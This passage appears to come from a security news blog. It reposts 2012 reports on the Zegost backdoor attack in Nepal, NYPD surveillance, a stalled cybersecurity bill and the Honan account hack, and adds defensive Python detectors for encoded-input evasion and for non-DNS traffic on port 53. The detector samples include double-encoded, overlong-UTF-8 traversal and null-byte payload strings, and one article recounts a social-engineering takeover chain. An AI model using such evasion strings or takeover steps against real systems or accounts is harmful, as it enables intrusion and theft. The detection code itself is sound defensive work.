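    except ValueError as exc:
        return [f"malformed-encoding ({exc})"]
    if b"\x00" in decoded:
        anomalies.append("null-byte")
    try:
        text = decoded.decode("utf-8")          # strict: rejects overlong sequences
    except UnicodeDecodeError:
        anomalies.append("invalid-utf8")
        return anomalies
    if PCT_ESCAPE.search(text):                 # still encoded after one pass
        anomalies.append("double-encoding")
    return anomalies


# Constructed samples (not taken from any real traffic or real files)
SAMPLE_UPLOADS = [
    ("report.txt", b"Quarterly numbers\n"),
    ("report.txt", b"MZ\x90\x00" + b"\x00" * 60),        # renamed Windows executable
    ("tool.exe", b"\x7fELF\x02\x01\x01" + b"\x00" * 9),
]
SAMPLE_PARAMS = ["42", "%2527", "%C0%AE%C0%AE", "abc%00", "%zz"]

if __name__ == "__main__":
    for name, content in SAMPLE_UPLOADS:
        print(name, inspect_upload(name, content))
    for param in SAMPLE_PARAMS:
        print(param, inspect_param(param))
```

The parameter checks return the reason rather than a bare boolean so that the evasion itself can be logged and alerted on, which is the "draws more attention from the WAF" effect the article describes.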
-
Researchers have uncovered another attack exploiting a Java vulnerability against activists and government agencies in Nepal. The attack resulted in a backdoor being installed on victims' machines.

Two Nepalese government agencies, the National Information Technology Center and the Office of the Prime Minister and Council Minister, were targeted in this latest attack, Gianluca Giuliani, a security researcher with Websense, wrote on the Websense Security Labs blog. Attackers injected malicious code designed to exploit a Java Runtime Environment vulnerability onto the agency sites. The attacks relied on code modified from a Metasploit module for that vulnerability, Giuliani added.

When triggered, the code installed a backdoor called Zegost onto the victim machines. Zegost is a common remote administration tool and is capable of logging keystrokes, remote code execution, and stealing and transferring data. The backdoor in the Nepalese attacks opened an outbound connection to a remote command-and-control server hosted on "who.xhhow4.com," a domain based in China, Giuliani said.

"As in other cases, we can see that this backdoor isn't highly complex at all, but it's certainly no less effective than other complex malware once executed on the target systems," Giuliani wrote.

The same Java vulnerability, CVE-2012-0507, had been used in previous attacks against Amnesty International and the Institute for National Security Studies in Israel, Giuliani said. All three attacks used code taken from the Metasploit framework, although that doesn't necessarily indicate a link between them. However, it was noteworthy that the same xhhow4.com domain also hosted the C&C server used in the Amnesty attack, Giuliani noted. Zegost has also been used to target Uyghurs, Tibetans, and other ethnic groups in Eastern and Central Asia, according to AlienVault.

The method of infection is familiar, with attackers first compromising the targeted site and then injecting malicious code exploiting a common vulnerability. The main page was infected with a Java JAR file loader, and when executed, it attempted to exploit the Java flaw, Giuliani said. The exploit shellcode then downloads and runs the "tools.exe" executable, which is really Zegost, onto the impacted system. It appears the Office of the Prime Minister and Council Minister website was compromised in May, according to Websense.

The backdoor on the impacted system uses local TCP port 1320 to connect to the C&C server on TCP port 53, which is a little unusual. Even though port 53 is generally reserved for DNS zone transfers, the traffic over the port used a proprietary protocol, according to Websense.

Interestingly, the installed software was signed by a valid certificate issued by VeriSign, Giuliani said. Malicious code signed with valid certificates is a trend that we've seen in other targeted attacks, he said. The trend "can reduce the effectiveness of human and automatic countermeasures," he said.

Source
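The detail worth acting on in the article above is the command-and-control channel: TCP port 53 carrying something that is not DNS. The Python below is an added example for this post, not code from Websense or the researcher, showing how a monitor can check whether a TCP/53 stream follows the DNS-over-TCP framing of RFC 1035 section 4.2.2 and report flows that do not. The flow records and payloads are constructed; the non-DNS payload is a placeholder and does not reproduce Zegost's actual protocol.

```python
"""Flag TCP connections to port 53 whose first bytes are not a framed DNS message."""
import struct

# Opcodes defined by RFC 1035 (QUERY, IQUERY, STATUS), RFC 1996 (NOTIFY), RFC 2136 (UPDATE)
VALID_OPCODES = {0, 1, 2, 4, 5}


def _parse_name(msg: bytes, offset: int):
    """Walk DNS labels from offset; return the offset after the name, or None if the
    labels are malformed (label longer than 63, runs past the message, no terminator)."""
    while True:
        if offset >= len(msg):
            return None
        length = msg[offset]
        if length == 0:
            return offset + 1
        if (length & 0xC0) == 0xC0:          # compression pointer (2 bytes) ends the name
            return offset + 2 if offset + 1 < len(msg) else None
        if length > 63:
            return None
        offset += 1 + length


def looks_like_dns_over_tcp(stream: bytes) -> bool:
    """True if the stream starts with a DNS-over-TCP message: a 2-byte length prefix,
    a 12-byte header with a defined opcode and exactly one question, and a well-formed
    question name followed by QTYPE and QCLASS."""
    if len(stream) < 2 + 12:
        return False
    (msg_len,) = struct.unpack("!H", stream[:2])
    if msg_len < 12 or msg_len > len(stream) - 2:
        return False
    msg = stream[2:2 + msg_len]
    _ident, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    opcode = (flags >> 11) & 0xF
    if opcode not in VALID_OPCODES or qdcount != 1:
        return False
    end = _parse_name(msg, 12)
    return end is not None and end + 4 <= len(msg)   # QTYPE + QCLASS must fit


def suspicious_port53_flows(flows):
    """flows: iterable of (src_ip, src_port, dst_ip, dst_port, first_bytes).
    Returns the flows that talk to TCP/53 without DNS framing."""
    return [f for f in flows if f[3] == 53 and not looks_like_dns_over_tcp(f[4])]


# Constructed sample traffic (not captured from the incident described above)
DNS_QUERY = (
    b"\x00\x1d"                             # length prefix: 29 bytes follow
    b"\x12\x34\x01\x00"                     # id, flags (opcode QUERY, RD set)
    b"\x00\x01\x00\x00\x00\x00\x00\x00"     # QD=1, AN=0, NS=0, AR=0
    b"\x07example\x03com\x00"               # QNAME example.com
    b"\x00\x01\x00\x01"                     # QTYPE A, QCLASS IN
)
NOT_DNS = b"PROP\x01\x00\x00\x00" + b"\x00" * 24   # placeholder proprietary handshake

SAMPLE_FLOWS = [
    ("10.0.0.5", 41234, "10.0.0.53", 53, DNS_QUERY),
    ("10.0.0.7", 1320, "203.0.113.9", 53, NOT_DNS),   # same local-port pattern as the article
    ("10.0.0.7", 1321, "203.0.113.9", 443, NOT_DNS),  # not port 53, out of scope here
]

if __name__ == "__main__":
    for flow in suspicious_port53_flows(SAMPLE_FLOWS):
        print("non-DNS traffic to TCP/53:", flow[:4])
```

Checking the framing and the question name, rather than only the header, keeps random or proprietary bytes from passing by chance; a real deployment would run the same check on the first segment of each TCP/53 flow captured by its sensor.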
-
Microsoft helps develop surveillance system that analyzes all sorts of real-time crime data.

Microsoft and the New York Police Department have jointly developed a data aggregation and analysis system that allows officers to tap into live video camera feeds, 911 calls, mapped crime statistics, and license plate readers to fight crime. Based on Microsoft technologies, the Domain Awareness System will be available to law enforcement and intelligence agencies around the world, with the city of New York receiving 30 percent of the revenues, New York Mayor Michael Bloomberg and Police Commissioner Raymond Kelly announced today.

The system, launched today, can help alert authorities to potential terrorist activities as well as fight everyday crime, Bloomberg said in a press conference at the Lower Manhattan Security Command Center. (Video of the news conference is here.) The center serves as a hub for information from a variety of sources, including a network of video cameras that are programmed to sound an alarm if there is an unattended package at the entrance to a building, as well as 600 radiation detectors and more than 100 license plate readers on police cars and at bridges, tunnels and streets.

"We're finding new ways to leverage already existing cameras, crime data, and other tools to support the work of our investigators, making it easier for them to determine whether a crime is part of an ongoing pattern," Bloomberg said. For example, the system can alert analysts to the presence of suspicious packages and cars while police search for suspects using smart cameras and license plate readers.

The system will be used "only to monitor public areas and activities, where no legally protected reasonable expectation of privacy exists," and facial recognition technology is not used, according to the Public Security Privacy Guidelines (PDF). Video will be retained for 30 days, metadata and license plate data for five years, and so-called "environmental data" collected by devices designed to detect hazards related to terrorist threats will be held indefinitely.

Peter Eckersley, technology projects director at the Electronic Frontier Foundation, told CNET he was worried about the possibility that the system would be abused by officers looking to track down the whereabouts of citizens without having to get a warrant.

"It takes a lot of chutzpah for Microsoft and the NYPD to describe location data from license plate readers and surveillance cameras as 'public safety data.' The history of places that we drive our cars is private, and such records would reveal intimate facts about the religion, politics, sexuality, and health of those who drive," Eckersley said in an e-mail. "In the George W. Bush era, Admiral Poindexter promised to build a 'Total Information Awareness' program to wrap America in a layer of ubiquitous high-tech surveillance. But it seems that it took Microsoft and the NYPD to finally bring that vision to life."

Source
-
With an election looming, parochial partisan politics trumped national security -- shocker, I know -- leaving cybersecurity policy firmly in midair.

Even for a Congress whose antics faintly remind one of the last days of the Weimar Republic, this was a bit much. The United States Senate last week was unable to bring up the Cybersecurity Act of 2012 (PDF) for a final vote because of -- shocker -- party politics. Had it passed into law, the bill would have made sure that operators of critical infrastructure -- stuff like nuclear plants and water treatment facilities -- satisfied certain minimum cybersecurity standards, an idea championed by heavy hitters in the defense, national security, and intelligence circles. Not this time, though, as its supporters fell 8 votes short of the 60 needed to overcome a Republican filibuster. And now Congress has left for its summer recess. Priceless.

Sen. John McCain (R-Ariz.), who led the opposition, complained that the legislation would have shackled businesses with unnecessary new burdens. Matt Kibbe, a Tea Party fave and head of the conservative group FreedomWorks, slammed the bill as "deeply flawed" and said it would stifle innovation on the Internet. The U.S. Chamber of Commerce denounced the idea as a hastily conceived piece of legislation chockablock with regulations that went too far. Senate GOP leader Mitch McConnell later explained that Republicans had decided to filibuster out of a desire to make the legislation better and instead blamed Harry Reid for seeking "to jam something through without any chance for amendment." The Wall Street Journal's editorial board advanced a similar meme, lecturing the Democrats, silly boys, for bringing to the floor a bill that the paper said was unpalatable.

Let's give them the benefit of the doubt, election year politics notwithstanding. But this was no bolt from the blue. The legislative horse-trading has been going on for months. In fact, earlier compromises agreed to by the bill's sponsors had watered down the original language to make it more acceptable to the myriad affected constituencies, and the latest version made voluntary a mandate to set security standards for computer networks running the nation's critical infrastructure. It also tweaked certain provisions in the bill to allay concerns expressed by the civil liberties crowd (both the Center for Democracy & Technology and the ACLU are now on board).

Did the bill still have warts? Some thought so, and reasonable people can disagree reasonably about that. Then again, reasonableness is on hold until Nov. 5, so the question now is how long ought the country to wait for perfect?

"Amendments can be brought on," Robert Rodriguez, chairman and managing principal of the Security Innovation Network, said after the vote. "It's time to place a stake in the ground, to own it and lead it. But this is standard Washington, D.C., politics. We have an election, and some of these politicians, frankly, have to stop putting a finger in the air and trying to guess which way the wind is blowing. It's time to think of the American shareholder and do what's best for the country."

That sense of disappointment permeates the defense, national security, and intelligence circles, where the heavy hitters, including the NSA's head general, Keith Alexander, and the chairman of the Joint Chiefs of Staff, Gen. Martin Dempsey, had urged the bill's passage. And at a recent gathering, the Aspen Institute's Homeland Security Group -- more than half of whom were Bush administration appointees -- also threw their support behind the proposal. "The country is already being hurt by foreign cyberintrusions, and the possibility of a devastating cyberattack is real," the group said in a statement. "Congress must act now."

Despite the setback, the battle may not be over. On Monday President Obama was reported to be considering issuing an executive order. Also, Leslie Phillips, communications director for the Senate Homeland Security and Governmental Affairs Committee, told my CNET colleague Elinor Mills that one of the bill's co-sponsors, Sen. Joe Lieberman (I-Conn.), remains open to raising the issue again in September. Phillips also said Lieberman is willing to sit down with Republicans to hash things out. However, she said that Republicans need to provide specific language for any amendments they want, rather than the list with 15 placeholders they submitted last week.

"GOP opponents insisted that security standards weren't really voluntary or what was now voluntary would soon become mandatory," she said. "We're happy to have open debate and entertain any amendment that is relevant and germane. There were gun amendments and abortion amendments and a lot of others, 218 amendments in all," she said.

Seriously? That has little to do with how to improve cybersecurity or defend in case of a cyberwar. (See The Atlantic for a good overview of what a real cyberwar might look like.) But we don't even need to go to the extreme scenario of critical infrastructure getting knocked offline. We're right now suffering through one of the greatest transfers of wealth in the history of mankind owing to the theft of intellectual property, and why nobody's talking about that on the national stage remains a mystery.

"La guerre! C'est une chose trop grave pour la confier à des militaires," said former French Prime Minister Georges Clemenceau. The loose translation: War is too serious a matter to entrust to military men. At the rate we're going, cybersecurity is proving too serious a matter to entrust to the political pygmies in Washington.

Source
-
After a tech reporter detailed his nightmarish saga of being hacked because of Amazon and Apple security flaws, the e-commerce giant says it has changed its system to make things more secure.

When tech reporters get hacked, it seems like tech companies pay attention. Wired reporter Mat Honan's entire online life was compromised by a hacker named Phobia four days ago. Phobia used Honan's AppleCare and Amazon IDs, along with his billing address and the last four digits of his credit card, to get into his various online accounts. Apple responded yesterday saying that it was looking into how users can reset their account passwords to ensure data protection; and Amazon responded today.

"We have investigated the reported exploit, and can confirm that the exploit has been closed as of yesterday afternoon," an Amazon representative told CNET today.

What this means is that Amazon customers can no longer make changes to their account settings by telephone, according to PC Magazine. A small but significant change -- because it was by calling Amazon that Phobia eventually succeeded in deleting Honan's Google and Twitter accounts and wiping his MacBook, iPad, and iPhone clean.

"In many ways, this was all my fault," Honan wrote in an article for Wired yesterday that detailed his saga. "My accounts were daisy-chained together. Getting into Amazon let my hackers get into my Apple ID account, which helped them get into Gmail, which gave them access to Twitter."

The way Phobia gained entry into Honan's Amazon account was by calling the e-commerce giant pretending to be Honan and adding a credit card to his account -- all he needed to do this was Honan's name, e-mail address, and billing address. Then, Phobia called Amazon again and said he couldn't access the account, and this is how he was able to use the credit card information to add another e-mail address and reset Honan's password. It all snowballed from there as Phobia was then able to get into Honan's Apple account, call AppleCare, get access to Honan's iCloud account, and then delete everything.

"But what happened to me exposes vital security flaws in several customer service systems, most notably Apple's and Amazon's," Honan wrote. "Apple tech support gave the hackers access to my iCloud account. Amazon tech support gave them the ability to see a piece of information -- a partial credit card number -- that Apple used to release information. In short, the very four digits that Amazon considers unimportant enough to display in the clear on the Web are precisely the same ones that Apple considers secure enough to perform identity verification."

Despite Honan having to go through digital hell for security changes to be made at Apple and Amazon, he hopefully has made the Internet just a little bit safer for others.

Source